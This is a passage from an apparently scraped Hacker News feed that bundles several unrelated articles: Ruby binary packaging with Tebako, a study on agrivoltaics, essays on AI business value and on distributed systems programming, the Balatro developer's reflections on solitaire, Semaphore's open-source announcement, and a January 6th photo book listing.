    The binary terminalwire-exec is the Ruby app I packaged up using Tebako! The Terminalwire executables forward the tinyzap link create command through the terminalwire-exec Tebako binary to the wss://tinyzap.com/terminal endpoint. It turns out it’s not magic; it’s just a different approach to building command-line apps for web apps that I summarize to Rails developers as “Hotwired, but for command-line apps.”

    In this article, I’m going to focus on how I used Tebako to package up the terminalwire-exec thin client I implemented in Ruby and distribute it to macOS and Linux users who don’t have Ruby installed on their machines.

    Building a Ruby application with Tebako is as straightforward as running the tebako build command.

    tebako press \
    
      --entry-point hello.rb \ # Script you want to run
    
      --root .               \ # Root of your project folder
    
      --Ruby 3.4.2           \ # Version of Ruby you want to package
    
      --output howdy         \ # Name of the binary file
    

    The way it works is pretty cool–application files are packaged up using DwarFS, which is a read-only file system Tebako compiles into the Ruby binary and loads from memory when it’s executed.

    Let’s go back to Ruby. In the example above, you selected Ruby 3.4.2, which is the most current version of Ruby at the time of writing. Tebako starts compiling Ruby like any compiler would, but then it patches the part of Ruby that starts running scripts with DwarFS and the entry-point file from the command line above.

    When it’s all said and done, you get a single Ruby binary that runs the hello.rb file you specified from DwarFS when users run howdy.

    15 megabyte binaries

    The most pleasant surprise I encountered with Tebako is the size of the binaries. terminalwire-exec ended up being roughly 14-15 megabytes.

    Terminalwire binaries weigh in at 15 megabytes

    Just to give you an idea of how that stacks up against some other popular command-line tools, Heroku’s Homebrew heroku app weighs in at 452.3 MB and GitHub’s gh app is 46.3 MB.

    Docker containers

    For those who don’t want to install the Ruby dependencies on their workstations for Tebako builds, there are a few Dockerfiles Tebako maintains that are designed to run locally on your workstations and in CI environments.

    For Terminalwire, I didn’t end up using these containers because it didn’t fit into my CI workflow. More on that later.

    Cross-platform compilations

    Building cross-platform binaries is a bit more challenging with Tebako than languages like Go. The main challenge is you have to compile the Tebako package on the operating system and architecture you’re targeting.

    If the platforms GitHub Actions supports are enough to cover the platforms you’re targeting, that’s pretty easy. At the time of this writing GitHub Actions supports arm64 macOS, x86_64 Linux, and arm64 Linux out of the box, but for Terminalwire I needed to support x86_64 macOS builds.

    To get that working, I pulled my 2016 MacBook Pro out of the closet, turned it on, installed macOS 13, set up a development environment, and got Tebako building binaries for that platform. It took a bit of work getting that environment set up, but once it was up and running it was quite easy to compile Tebako x86_64 macOS builds.

    DwarFS, paths, and $PROGRAM_NAME

    One thing to keep in mind when you start using Tebako is how paths work. Remember how Ruby files are compiled into the binary via DwarFS? Those files live in memory compiled into the Ruby applications. That means if your Ruby app needs to know the location of a file within itself, you’ll get back paths prefaced with /__tebako_memfs__.

    ./howdy
    irb(main):001> __FILE__
    => "/__tebako_memfs__/bin/hello.rb"
    

    I’m pretty sure this is a problem unique to the Terminalwire client, but it needs to know the name of the running binary to send to the Terminalwire server so it can be used to process a command. To my surprise, $PROGRAM_NAME gave me the path of the entry-point file:

    ./howdy
    irb(main):001> $PROGRAM_NAME
    => "/__tebako_memfs__/bin/hello.rb"
    

    Instead of the expected name of the binary.

    ./howdy
    irb(main):001> $PROGRAM_NAME
    => "howdy"
    

    The good news is I opened an issue on their repo and there’s a few opinions flying around about how that should behave and be implemented.

    Packaging scenarios

    One thing I’m not a huge fan of for Tebako are the packaging scenarios. The tebako press command will build projects differently depending on the entrypoint and files passed into it that I think does “too much magic”.

    A screenshot of the Tebako packaging scenarios table

    Since Terminalwire is a monorepo with multiple gems, it took me a while to figure out which directory I had to pass into tebako press to get a binary out the other side. My CI pipeline currently uses the “packaged gem” scenario, which means I need to cut releases of my gem to RubyGems before building a Tebako executable. This complicates my pre-release CI workflow since I have to release *.*.*.alpha* gems, but it does get a Tebako build out the door.

    When I start seriously considering the usage of open source in my projects, I edit the README in areas that I think could be clearer or more helpful for the next person that comes along, then I open a PR to see what it’s like getting a change merged into the repo.

    As I started running into some of the issues I discussed above, I opened issues in GitHub with reproduction steps and various contributors were helpful in recreating the problem or understanding that it’s a “works on my machine” type of problem.

    Overall, I’ve had positive experiences working with the Tebako community.

    Overall I’m very pleased with Tebako. The community is responsive and pragmatic, the project has a vision, and it gives me reasonably sized binaries that I can run on many different platforms.

    The 15 megabyte binary file size for terminalwire-exec exceeded my expectations and it runs well on many different platforms.

    Setting up the continuous integration workflow for my requirements was a bit challenging and required more manual work, but as I get more iterations in with my pipeline and work with the project, I’m confident I’ll end up with a highly automated and repeatable build pipeline.

    I hope the Ruby community takes notice and starts doing the forbidden thing you’re not supposed to do–distribute Ruby applications to end users. If more people do it then I’m confident Tebako will only get better.

    Support this blog 🤗

    If you like what you read and want to see more articles like this, please consider using Terminalwire for your web application’s command-line interface. In under 10 minutes you can build a command-line in your favorite language and web framework, deploy it to your server, then stream it to the Terminalwire thin-client that runs on your users desktops. Terminalwire manages the binaries, installation, and updates, so you can focus on building a great CLI experience.

    ]]>
    https://terminalwire.com/articles/tebako hacker-news-small-sites-43196244 Thu, 27 Feb 2025 17:07:41 GMT
    <![CDATA[Harvest the sun twice: Agrivoltaics promises sustainable food, energy and water]]> thread link) | @gnabgib
    February 27, 2025 | https://www.sheffield.ac.uk/news/harvesting-sun-twice-agrivoltaics-shows-promise-sustainable-food-energy-and-water-management-east | archive.org

    Combining solar power production with agriculture can significantly boost crop yields, conserve water and generate low-carbon electricity for areas particularly vulnerable to climate change, a new study has shown.

    • A new international study, led by the University of Sheffield, found using the same land for both solar energy production and agriculture can generate low-carbon electricity, improve crop yields and reduce water loss 
    • The method, known as agrivoltaics, offers a sustainable solution to the pressing challenges of food insecurity, water scarcity, and energy poverty
    • By shading crops with solar panels, agrivoltaics creates a microclimate helping certain plants, like beans and maize, to thrive whilst needing less water irrigation
    • Agrivoltaics can also provide a reliable source of clean energy for rural communities 


    Combining solar power production with agriculture can significantly boost crop yields, conserve water and generate low-carbon electricity for areas particularly vulnerable to climate change, a new study has shown.

    Research led by the University of Sheffield reveals agrivoltaics - the practice of using the same land for farming and to produce solar electricity - leads to greater crop yields with less water than crops grown in open fields.

    The international team, led by Sheffield scientists in collaboration with the Center for International Forestry Research and World Agroforestry (CIFOR-ICRAF), Sustainable Agriculture Tanzania, Latia Agribusiness Solutions and the University of Arizona, found certain crops, such as maize, Swiss chard and beans, thrived under the partial shade provided by solar panels.  

    The shade also helped to reduce water loss through evaporation, leading to more efficient water usage. Additionally, rainwater harvested from the panels could be used to supplement irrigation needs.

    Senior author of the study, Professor Sue Hartley from the University of Sheffield’s School of Biosciences and Vice-President for Research and Innovation, said: “Imagine a future where farms are powered by clean energy  and crops are more resilient   to climate change. Agrivoltaics can make this vision a reality by offering a sustainable solution to the pressing challenges of food insecurity, water scarcity, and energy poverty.

    “By shading crops with solar panels, we created a microclimate that helped certain crops produce more, but they were also better able to survive heat waves and the shade helped conserve water, which is crucial in a region severely threatened by climate change.”

    Beyond increased crop yields and water conservation, the study showed agrivoltaics can also provide a reliable source of clean energy for rural communities. Off-grid solar power systems can power homes, businesses, and agricultural equipment, improving the quality of life for many.

    Lead author of the study, Dr Richard Randle-Boggis, who conducted the research at the University of Sheffield and is now a research scientist at SINTEF, said: “By combining solar panels and farming, we were able to get more from the land. This multifunctional approach shows the potential of agrivoltaics to boost food production and clean electricity generation while reducing the need for irrigation. 

    “However, it's important to remember that one size doesn't fit all. We need to tailor these systems to specific locations, especially in hot and dry climates.”

    To view the full paper, please visit: Science Direct

    ]]>
    https://www.sheffield.ac.uk/news/harvesting-sun-twice-agrivoltaics-shows-promise-sustainable-food-energy-and-water-management-east hacker-news-small-sites-43196133 Thu, 27 Feb 2025 16:56:14 GMT
    <![CDATA[Climbing the AI Layer Cake]]> thread link) | @whakim
    February 27, 2025 | https://halcyon.eco/blog/climbing-the-ai-layer-cake | archive.org

    Climbing the AI Layer Cake

    Picture of Nat Bullard & Will Hakim

    Today's Machine Readable entry is a collaboration between Nat Bullard and Will Hakim, Staff Software Engineer, Halcyon

    If you’ve been paying attention to large language model (LLM) benchmarks, the past few months have been as astounding as any since the debut of GPT-3 back in 2022: OpenAI’s o3 producing a step-function improvement on ARC-AGI; DeepSeek’s R1 catching up to – and in some cases, surpassing – OpenAI’s o1 at a fraction of the cost; and Anthropic’s steady drumbeat of impressive model announcements, mostly recently Claude 3.7 Sonnet. And yet, at the application layer, it doesn’t feel like as much has changed.

    To use a firsthand example, while LLMs have made massive strides in code generation, they still require a software engineer to conceptualize what they’re trying to build and to articulate that concept in a written text prompt. This disconnect between the advances in foundational technology and the utility of its applications have led us to reflect on past technological transformations and how companies throughout the AI ecosystem should think about positioning themselves to create value in the midst of such a shift.

    Our conviction is that AI will be widely available, constantly improving, hard to differentiate at its basic level, and priced competitively and according to specific demand. Equally importantly, it will be part of a process of transforming something of lower value into something else of higher value. And within that transformation, it raises a question: to whom does value accrue in this transformation process?

    To explore this idea, we batted around three possibilities about how AI with these attributes could manifest in business. 

    The new loom

    A concept predating the digital era: is AI the new power loom? The power loom changed a craft - the making of fabric, often at home, using a device but in a highly personal fashion - into an industry. The power loom transformed what had been a home activity and a small financial undertaking into something done at sufficient scale for the creation of mass-manufactured sales and exports.

    A change of scale is also a change of scope. An industrial loom didn’t just do the work of many handloom operators - it did it more consistently, and without the same dexterity required. Labor did not go away, but it became different - less about skill in creating a product, and more about skill in maintaining the machine. 

    In this vision for AI, the machine / process is extremely powerful, but it delivers very little value to the operator while sending a great deal to the owner. The owner, too, is quite literally an owner as well, of a physical machine and all of the apparatus needed to energize and sustain it. But, value accrues too to those who use not just the process (the loom) but the output (the fabric) and even further, to those who use that output as their own input (apparel makers).  

    Feb 26 2025 quote

    The new spreadsheet 

    Another concept we debated: is business-focused artificial intelligence the next spreadsheet? Spreadsheets were the killer app for an initial subset of customers (finance and accounting professionals) and also a (if not the) killer app for the Apple II when VisiCalc, the first spreadsheet for a personal computer, was released in 1979. 

    The spreadsheet was born with one use case and one target market, but it has since become a framework for all sorts of things. Finance, obviously, is still paramount, but spreadsheets are also used for tasks as basic as lists or schedules. It would be hard to say that a spreadsheet is the killer app for a computer today, even if it is essential to workflows across multiple industries. 

    But where does the value in being essential lie? Killer app status was not enough for VisiCalc to persist. Microsoft Excel, introduced in 1985, is still with us today as part of Microsoft’s $77 billion annual revenue Productivity and Business Processes business line. But, that business is now smaller than Microsoft’s cloud business. And, it has a direct (and free) competitor in the form of Google Sheets.

    We think of its value then, in two ways. The first is in the value it creates for its creator (Microsoft) which is tens of billions of dollars of annual recurring revenue. The second is in the value that it enables for its customers. What has been more valuable: encoding the first =SUMIF() capability, or building something with it? To put it in revenue terms: has Microsoft made more money since 1985 selling Excel, than the world’s financial and professional services firms have earned using it in the same time? 

    The new smartphone

    Another idea: is AI the new smartphone? Mobile phones existed for decades and sold in the billions before the iPhone arrived and transformed mobile telephony. Prior to 2007, mobile phones (such as Blackberry Messenger) could download and operate software (or, ringtones), take photos, send and receive emails, and operate social networks. But it was the release of the iPhone and App Store, and the subsequent explosion of equally capable devices, that created a universe of new businesses and new values.  

    Ubiquitous cameras enabled companies such as Instagram. Device-level, personal geolocation enabled companies as prosaic as Foursquare and as disruptive as Uber. A galaxy of hardware (not just chipsets and cameras but antennas and accelerometers) came together to enable a universe of new businesses built on the combination and concert of other technologies.  

    In this imagination, AI is the coordinating layer for all sorts of disparate activities in one frame. Much like an app store, it is a place where people deliver services, ranging from extremely tailored to nearly universal. Much like a device in one’s pocket, it is always on and always available. It is the interface between highly specialized hardware and often-specific software and us, but even still it is only one layer of many in value creation. 

    The new force multiplier

    These historical examples show how transformative applications amplify existing human activities to unprecedented speed and scope. The power loom didn't invent textile production — it made it possible at industrial scale, transforming what was once artisanal into something that could clothe nations. Spreadsheets didn't create financial analysis — they democratized it, allowing complex modeling that previously required teams of accountants. Smartphones didn't invent photography or transportation — they made them instantly accessible, turning occasional activities into daily habits. In each case, the technology served as a force multiplier for established human needs, creating exponential value not by inventing new activities but by removing friction from existing ones.

    That's the promise we’re pursuing at Halcyon: not to replace human expertise, but to dramatically amplify it, allowing energy professionals to achieve outcomes that would have been impractical or impossible before. The most enduring value comes from this amplification — not from incremental improvements to the underlying technology itself.

    Comments or questions? We’d love to hear from you - sayhi@halcyon.eco, or find us on LinkedIn and Twitter

    ]]>
    https://halcyon.eco/blog/climbing-the-ai-layer-cake hacker-news-small-sites-43196066 Thu, 27 Feb 2025 16:49:14 GMT
    <![CDATA[macOS Tips and Tricks]]> thread link) | @signa11
    February 27, 2025 | https://saurabhs.org/macos-tips | archive.org

    Unable to extract article]]>
    https://saurabhs.org/macos-tips hacker-news-small-sites-43195773 Thu, 27 Feb 2025 16:20:17 GMT
    <![CDATA[When Did They Die?]]> thread link) | @docdeek
    February 27, 2025 | https://www.whentheydied.com/play?HN | archive.org

    Unable to retrieve article]]>
    https://www.whentheydied.com/play?HN hacker-news-small-sites-43195743 Thu, 27 Feb 2025 16:17:05 GMT
    <![CDATA[Distributed systems programming has stalled]]> thread link) | @shadaj
    February 27, 2025 | https://www.shadaj.me/writing/distributed-programming-stalled | archive.org

    Over the last decade, we’ve seen great advancements in distributed systems, but the way we program them has seen few fundamental improvements. While we can sometimes abstract away distribution (Spark, Redis, etc.), developers still struggle with challenges like concurrency, fault tolerance, and versioning.

    There are lots of people (and startups) working on this. But nearly all focus on tooling to help analyze distributed systems written in classic (sequential) programming languages. Tools like Jepsen and Antithesis have advanced the state-of-the-art for verifying correctness and fault tolerance, but tooling is no match for programming models that natively surface fundamental concepts. We’ve already seen this with Rust, which provides memory safety guarantees that are far richer than C++ with AddressSanitizer.

    If you look online, there are tons of frameworks for writing distributed code. In this blog post, I’ll make the case that they only offer band-aids and sugar over three fixed underlying paradigms: external-distribution, static-location, and arbitrary-location. We’re still missing a programming model that is native to distributed systems. We’ll walk through these paradigms then reflect on what’s missing for a truly distributed programming model.


    External-distribution architectures are what the vast majority of “distributed” systems look like. In this model, software is written as sequential logic that runs against a state management system with sequential semantics:

    • Stateless Services with a Distributed Database (Aurora DSQL, Cockroach)
    • Services using gossiped CRDT state (Ditto, ElectricSQL, Redis Enterprise)111. This may come as a surprise. CRDTs are often marketed as a silver bullet for all distributed systems, but another perspective is they simply accelerate distributed transactions. Software running over CRDTs is still sequential. This may come as a surprise. CRDTs are often marketed as a silver bullet for all distributed systems, but another perspective is they simply accelerate distributed transactions. Software running over CRDTs is still sequential.
    • Workflows and Step Functions

    These architectures are easy to write software in, because none of the underlying distribution is exposed222. Well that’s the idea, at least. Serializability typically isn’t the default (snapshot isolation is), so concurrency bugs can sometimes be exposed. Well that’s the idea, at least. Serializability typically isn’t the default (snapshot isolation is), so concurrency bugs can sometimes be exposed. to the developer! Although this architecture results in a distributed system, we do not have a distributed programming model.

    There is little need to reason about fault-tolerance or concurrency bugs (other than making sure to opt into the right consistency levels for CRDTs). So it’s clear why developers opt for this option, since it hides the distributed chaos under a clean, sequential semantics. But this comes at a clear cost: performance and scalability.

    Serializing everything is tantamount to emulating a non-distributed system, but with expensive coordination protocols. The database forms a single point of failure in your system; you either hope that us-east-1 doesn’t go down or switch to a multi-writer system like Cockroach that comes with its own performance implications. Many applications are at sufficiently low scale to tolerate this, but you wouldn’t want to implement a counter like this.


    Static-location architectures are the classic way to write distributed code. You compose several units—each written as local (single-machine) code that communicates with other machines using asynchronous network calls:

    • Services communicating with API calls, possibly using async / await (gRPC, REST)
    • Actors (Akka, Ray, Orleans)
    • Services polling and pushing to a shared pub/sub (Kafka)

    These architectures give us full, low-level control. We’re writing a bunch of sequential, single-machine software with network calls. This is great for performance and fault-tolerance because we control what gets run where and when.

    But the boundaries between networked units are rigid and opaque. Developers must make one-way decisions on how to break up their application. These decisions have a wide impact on correctness; retries and message ordering are controlled by the sender and unknown to the recipient. Furthermore, the language and tooling have limited insight into how units are composed. Jump-to-definition is often unavailable, and serialization mismatches across services can easily creep in.

    Most importantly, this approach to distributed systems fundamentally eliminates semantic co-location and modularity. In sequential code, things that happen one after the other are textually placed one after the other and function calls encapsulate entire algorithms. But with static-location architectures, developers are coerced to modularize code on machine boundaries, rather than on semantic boundaries. In these architectures there is simply no way to encapsulate a distributed algorithm as a single, unified semantic unit.

    Although static-location architectures offer developers the most low-level control over their system, in practice they are difficult to implement robustly without distributed systems expertise. There is a fundamental mismatch between implementation and execution: static-location software is written as single-machine code, but the correctness of the system requires reasoning about the fleet of machines as a whole. Teams building such systems often live in fear of concurrency bugs and failures, leading to mountains of legacy code that are too critical to touch.


    Arbitrary-location architectures are the foundation of most “modern” approaches to distributed systems. These architectures simplify distributed systems by letting us write code as if it were running on a single machine, but at runtime the software is dynamically executed across several machines333. Actor frameworks don’t really count even if they support migration, since the developer still has to explicitly define the boundaries of an actor and specify where message passing happens Actor frameworks don’t really count even if they support migration, since the developer still has to explicitly define the boundaries of an actor and specify where message passing happens :

    • Distributed SQL Engines
    • MapReduce Frameworks (Hadoop, Spark)
    • Stream Processing (Flink, Spark Streaming, Storm)
    • Durable Execution (Temporal, DBOS, Azure Durable Functions)

    These architectures elegantly handle the co-location problem since there are no explicit network boundaries in the language/API to split your code across. But this simplicity comes at a significant cost: control. By letting the runtime decide how the code is distributed, we lose the ability to make decisions about how the application is scaled, where the fault domains lie, and when data is sent over the network.

    Just like the external-distribution model, arbitrary-location architectures often come with a performance cost. Durable execution systems typically snapshot their state to a persistent store between every step444. With some optimizations when a step is a pure, deterministic function With some optimizations when a step is a pure, deterministic function . Stream processing systems may dynamically persist data and are free to introduce asynchrony across steps. SQL users are at the mercy of the query optimizer, to which they at best can only give “hints” on distribution decisions.

    We often need low-level control over where individual logic is placed for performance and correctness. Consider implementing Two-Phase Commit. This protocol has explicit, asymmetric roles for a leader that broadcasts proposals and workers that acknowledge them. To correctly implement such a protocol, we need to explicitly assign specific logic to these roles, since quorums must be determined on a single leader and each worker must atomically decide to accept or reject a proposal. It’s simply not possible to implement such a protocol in an arbitrary-location architecture without introducing unnecessary networking and coordination overhead.

    If you’ve been following the “agentic” LLM space, you might be wondering: “Are any of these issues relevant in a world where my software is being written by an LLM?” If the static-location model is sufficiently rich to express all distributed systems, who cares if it’s painful to program in!

    I’d argue that LLMs actually are a great argument why we need a new programming model. These models famously struggle under scenarios where contextually-relevant information is scattered across large bodies of text555. See the Needle in a Haystack Test; reasoning about distributed systems is even harder. See the Needle in a Haystack Test; reasoning about distributed systems is even harder. . LLMs do best when semantically-relevant information is co-located.

    The static-location model forces us to split up our semantically-connected distributed logic across several modules. LLMs aren’t great yet at correctness on a single machine; it is well beyond their abilities to compose several single-machine programs that work together correctly. Furthermore, LLMs make decisions sequentially; splitting up distributed logic across several networked modules is inherently challenging to the very structure of AI models.

    LLMs would do far better with a programming model that retains “semantic locality”. In a hypothetical programming model where code that spans several machines can be co-located, this problem becomes trivial. All the relevant logic for a distributed algorithm would be right next to each other, and the LLM can generate distributed logic in a straight-line manner.

    The other piece of the puzzle is correctness. LLMs make mistakes, and our best bet is to combine them with tools that can automatically find them666. Lean is a great example of this in action. Teams including Google and Deepseek have been using it for some time. Lean is a great example of this in action. Teams including Google and Deepseek have been using it for some time. . Sequential models have no way to reason about the ways distributed execution might cause trouble. But a sufficiently rich distributed programming model could surface issues arising from network delays and faults (think a borrow-checker, but for distributed systems).

    Although the programming models we’ve discussed each have several limitations, they also demonstrate desirable features that a native programming model for distributed systems should support. What can we learn from each model?

    I’m going to skip over external-distribution, which as we discussed is not quite distributed. For applications that can tolerate the performance and semantic restrictions of this model, this is the way to go. But for a general distributed programming model, we can’t keep networking and concurrency hidden from the developer.

    The static-location model seems like the right place to start, since it is at least capable of expressing all the types of distributed systems we might want to implement, even if the programming model offers us little help in reasoning about the distribution. We were missing two things that the arbitrary-location model offered:

    • Writing logic that spans several machines right next to each other, in a single function
    • Surfacing semantic information on distributed behavior such as message reordering, retries, and serialization formats across network boundaries

    Each of these points have a dual, something we don’t want to give up:

    • Explicit control over placement of logic on machines, with the ability to perform local, atomic computations
    • Rich options for fault tolerance guarantees and network semantics, without the language locking us into global coordination and recovery protocols

    It’s time for a native programming model—a Rust-for-distributed systems, if you will—that addresses all of these.

    Thanks to Tyler Hou, Joe Hellerstein, and Ramnivas Laddad for feedback on this post!

    1. This may come as a surprise. CRDTs are often marketed as a silver bullet for all distributed systems, but another perspective is they simply accelerate distributed transactions. Software running over CRDTs is still sequential.

    2. Well that’s the idea, at least. Serializability typically isn’t the default (snapshot isolation is), so concurrency bugs can sometimes be exposed.

    3. Actor frameworks don’t really count even if they support migration, since the developer still has to explicitly define the boundaries of an actor and specify where message passing happens

    4. With some optimizations when a step is a pure, deterministic function

    5. See the Needle in a Haystack Test; reasoning about distributed systems is even harder.

    6. Lean is a great example of this in action. Teams including Google and Deepseek have been using it for some time.

    ]]>
    https://www.shadaj.me/writing/distributed-programming-stalled hacker-news-small-sites-43195702 Thu, 27 Feb 2025 16:12:42 GMT
    <![CDATA[Is It an AWS EC2 Instance or a US Visa?]]> thread link) | @alach11
    February 27, 2025 | https://rahmatashari.com/app/ec2-visa-quiz | archive.org

    Unable to extract article]]>
    https://rahmatashari.com/app/ec2-visa-quiz hacker-news-small-sites-43195517 Thu, 27 Feb 2025 15:54:40 GMT
    <![CDATA[Solitaire]]> thread link) | @goles
    February 27, 2025 | https://localthunk.com/blog/solitaire | archive.org

    I have cited a few games as inspiration for Balatro in the past, but I wanted to talk about one in particular that hasn’t been mentioned much that arguably is the most important.

    I think if I had some kind of Balatro vision board, solitaire (Klondike) would be right in the middle of it with a big red circle around it. You can probably see some of the similarities between my game and the classic solo card game. I wanted my game to have the same vibe.

    If you’re somehow unfamiliar, solitaire is a group of card games characterized by solo play. Klondike is usually the variant that most people in the west associate with solitaire, but one could argue even Balatro is technically a solitaire game. Traditional solitaire games exist at the peak of game culture for me. These games are so ubiquitous and accepted by society that almost everyone has some memory of playing them. They have transcended gaming culture more than even the biggest IPs (like Tetris or Mario), and they occupy this very interesting wholesome niche. Solitaire is almost viewed as a positive pastime more than a game. That feeling interests me greatly as a game designer.

    As Balatro 1.0 development drew nearer to a close in early 2024, I found myself picturing the type of person that might play my game and what a typical play session might look like for them. My fantasy was that I was playing this weird game many years later on a lazy Sunday afternoon; I play a couple of runs, enjoy my time for about an hour, then set it down and continue the rest of my day. I wanted it to feel evergreen, comforting, and enjoyable in a very low-stakes way. I think that’s one of the reasons why there isn’t a player character, health, or classic ‘enemies’ in the game as well. I wanted this game to be as low stakes as a crossword or a sudoku puzzle while still exercising the problem solving part of the brain.

    Essentially I wanted to play Balatro like people play solitaire.

    One of the main ways that the vibe of solitaire and my own game differ is in the meta-game Balatro has that solitaire does not. Things like achievements, stake levels, unlocks, and challenges certainly can be looked at as a way to artificially inflate playtime, but those things were added for 2 other reasons I was more concerned about:

    1. To force players to get out of their comfort zone and explore the design of the game in a way they might not if this were a fully unguided gaming experience. In solitaire this probably isn’t super useful because the game has far fewer moving parts, so the player can figure everything out by themselves, but I don’t think that’s the case with a game like Balatro. I feel like even I learned a lot from these guiding goals that I wasn’t anticipating many months after the game launched.

    2. To give the players that already enjoy the game loop a sort of checklist to work through if they so choose. They can come up with a list of goals on their own (as I see many from the community have) but I do really appreciate when I play other games and they give me tasks to accomplish and shape my long-form play around while I enjoy the shorter play sessions individually.

    It’s now been over a year since launch and I am still playing Balatro almost daily. I play a couple runs before I go to bed, and I feel like I just might have accomplished the task of recreating the feeling of playing solitaire for myself. Seeing the discourse around my game has me fairly convinced that this is decidedly not how the average player has been interacting with my game, but I’m still thrilled that people are having a great time with it and I’m even more happy that I feel like this game turned out how I wanted as a player myself.

    This is why you might have seen me refer to this game as ‘jazz solitaire’ in the past. I wanted to bring the old feeling of solitaire into a game with modern design bells and whistles, creating something new and yet familiar. Only time will tell if I actually accomplished that.

    ]]>
    https://localthunk.com/blog/solitaire hacker-news-small-sites-43195516 Thu, 27 Feb 2025 15:54:36 GMT
    <![CDATA[Semaphore goes Open Source today]]> thread link) | @ezekg
    February 27, 2025 | https://semaphore.io/semaphore-goes-open-source-today | archive.org

    Today is a big day for us and, hopefully, for you too. We’re excited to announce that Semaphore’s core CI/CD platform is officially open source as of today. Now, you can explore, tweak, and contribute to the same production-grade code that’s powered your builds and deployments—all under the Apache 2.0 license.

    Find the GitHub repo here:

    We built Semaphore with real-world developers in mind. Over the years, many of you have faced the frustrations of opaque pipelines and vendor lock-in. By opening our code, we’re handing over the keys so you can better understand how everything works, fix issues, and even add new features.

    The open-source release brings you the same robust pipeline engine and workflow builder that handles millions of jobs every day. Semaphore is available in three flavors:

    • Semaphore Cloud for those who want a hassle-free, fully managed service
    • Semaphore Community Edition for anyone who loves to roll up their sleeves and dive into the code
    • Semaphore Enterprise for on-prem setups with additional enterprise features and support

    What’s next?

    • Contributions are open and very welcome, please read our contribution guide if you’re interested in participating.
    • Head over to the installation guide to learn how to install the Community Edition in your hardware.

    We invite you to head over to our GitHub repository, join the conversation on Discord, and voice your ideas. Let’s build a better CI/CD ecosystem together — one commit at a time.

    Happy coding!

    ]]>
    https://semaphore.io/semaphore-goes-open-source-today hacker-news-small-sites-43195484 Thu, 27 Feb 2025 15:52:23 GMT
    <![CDATA[Insurrection – a physical photo journal of January 6th]]> thread link) | @gooseus
    February 27, 2025 | http://www.nategowdy.com/insurrection-book-orders/p/9x11-hardcover-edition | archive.org

    On January 20, 2017, photojournalist Nate Gowdy stood at the U.S. Capitol, incredulous, as Donald J. Trump—with right hand raised and left atop the Lincoln Bible—took the presidential oath of office, vowing to end “American carnage.”

    Four years later, on January 6, 2021, Gowdy returned to Washington, DC, prepared to document one last MAGA rally: the outgoing president’s “Save America” speech at the Ellipse. Instead, he found himself amidst right-wing extremists, fervently inscribing that day into the annals of history.

    The result is Gowdy’s debut monograph, INSURRECTION, where surreal scenes unfold: militants marching, kneeling in prayer, posing for group photos, breaking for hotdogs, rampaging against the Capitol’s sworn protectors, and leading thousands to defile the Inauguration Day stage.

    Twice assaulted for being deemed “fake news,” Gowdy persisted in exposing the truth. Shot on assignment for Rolling Stone, his stark, unflinching images depict the US Capitol, one of democracy’s most sacred symbols, as it becomes a haunting set piece in a dystopian tableau of domestic terror—an inside job.

    This 150-page hardcover stands as the sole book of photojournalism dedicated to one of the darkest days in modern American history. Its timestamped photographs and contextual captions chronicle one of democracy’s most rarified spaces, once reserved for solemn and dignified assembly, as it is overwhelmed with—you guessed it—American carnage.

    Foreworded by DC Metropolitan Police Officer Daniel Hodges, who risked his life defending the Capitol and was almost crushed to death, INSURRECTION captures a chilling chapter in American politics, spotlighting the fragility of a nation’s ideals.

    INSURRECTION
    Photographs, text & design by Nate Gowdy
    Foreword by Officer Daniel Hodges
    Introduction by Michael Rowe
    Edited by Lisa van Dam-Bates
    Printed and bound in the USA

    • 124 duotone plates
    • 150 pages
    • 9x11 Hardcover
    • Published by Pigeon Editions, January 2023
    • ISBN-13: 978-1-7354812-3-4
    • Print run of 500

    Available here and at select Seattle bookstores, such as Elliott Bay Book Company.
    Shipping on this site is USA only (contact nate.gowdy@gmail.com for exceptions).

    You will receive an email notification when yours ships the next business day!

    ABOUT THE AUTHOR

    Nate Gowdy (1984; Elkhart, Indiana) is a Seattle photographer of 14 years who documents this American political era.

    In 2011, Gowdy was hired as staff photographer at Seattle Gay News, where he became immersed in the city’s queer and trans communities, primarily capturing drag and nightlife culture. He served as the official photographer for the Seattle Pride Parade from 2011 through 2024. In 2012, Gowdy dedicated himself to covering the fight for marriage equality in Washington state.

    Gowdy worked closely with President Obama in 2013 and Vice President Biden in 2014 during their visits to Seattle. Since 2015, he has self-funded coverage of hundreds of political rallies and demonstrations across 27 states and Washington, DC. In 2016, his portrait of Bernie Sanders was featured on TIME magazine’s cover, and editorial clients include Rolling Stone and Mother Jones.

    In 2019, Gowdy, with a small core team, spearheaded The American Superhero project, a collaborative studio portrait and storytelling series. The following year, he photographed and co-authored Our Students, Their Stories for Seattle Public Schools. This 100-page coffee table book celebrates LGBTQIA+ students, families, and staff, marking the first project of its kind commissioned by an American school district.

    In 2023, Gowdy self-published his first monograph, INSURRECTION. This award-winning, 150-page hardcover is the sole book to visually chronicle—with timestamped images and contextual captions—the deadly mob attack on the U.S. Capitol on January 6, 2021. With over 1,250 copies sold, the hardcover remains available at www.nategowdy.com and Elliott Bay Book Co.

    A journalism graduate from Indiana University and a former newspaper editor, preschool caregiver, and community outreach worker, Gowdy maintains a photography studio in Seattle’s International District. His fine art is represented at Monroe Gallery of Photography in Santa Fe, New Mexico. Outside of work, he enjoys teaching, kayaking, biking, yoga, and spending time with loved ones.

    AWARDS & HONORS

    • PX3—The Prix de la Photographie Paris (2023: 1st Place, Book Photographer of the Year; Gold in Book, Documentary; Gold in Press/Political)
    American Photography (Selected: 2023 [x4], 2022 [x2])
    Communication Arts Photography Annual (Books, 2022; Editorial, 2021)
    • International Photography Awards (2022: 1st Place in Book, Self Published; 3rd Place in Editorial/Press, War/Conflict; Best of Show [Guest Curator, Dr. Mark Sealy])
    • Lucie Photo Book Prize (2022: Independent Category Finalist)
    • Society of Professional Journalists Western Washington’s 2022 Passion Project Grant
    • Philipson Foundation’s 2022 Public Documentation Grant

    WHAT PEOPLE ARE SAYING

    “Gowdy's pictures show how close we came to losing our democracy. His book reminds us that we cannot and must not look away and that the threats against our fragile republic are as present as ever. I encourage everyone to page through this courageous work with eyes wide open to the violence, hatred, and lies that have swept up our politics.”
    — Congresswoman Pramila Jayapal (D-WA)

    INSURRECTION moves readers through the day in timestamped, chronological order, bringing them a firsthand, up-close account of not just the insurrection, but what it was like to be a journalist on the front lines of a battle for democracy.”
    — Mother JonesFirst, I want to thank you for photographing what you do. Kudos. I think you are a first-rate journalist. As soon as the insurrection occurred, I started looking at images I felt portrayed the event the best—yours always came out on top.
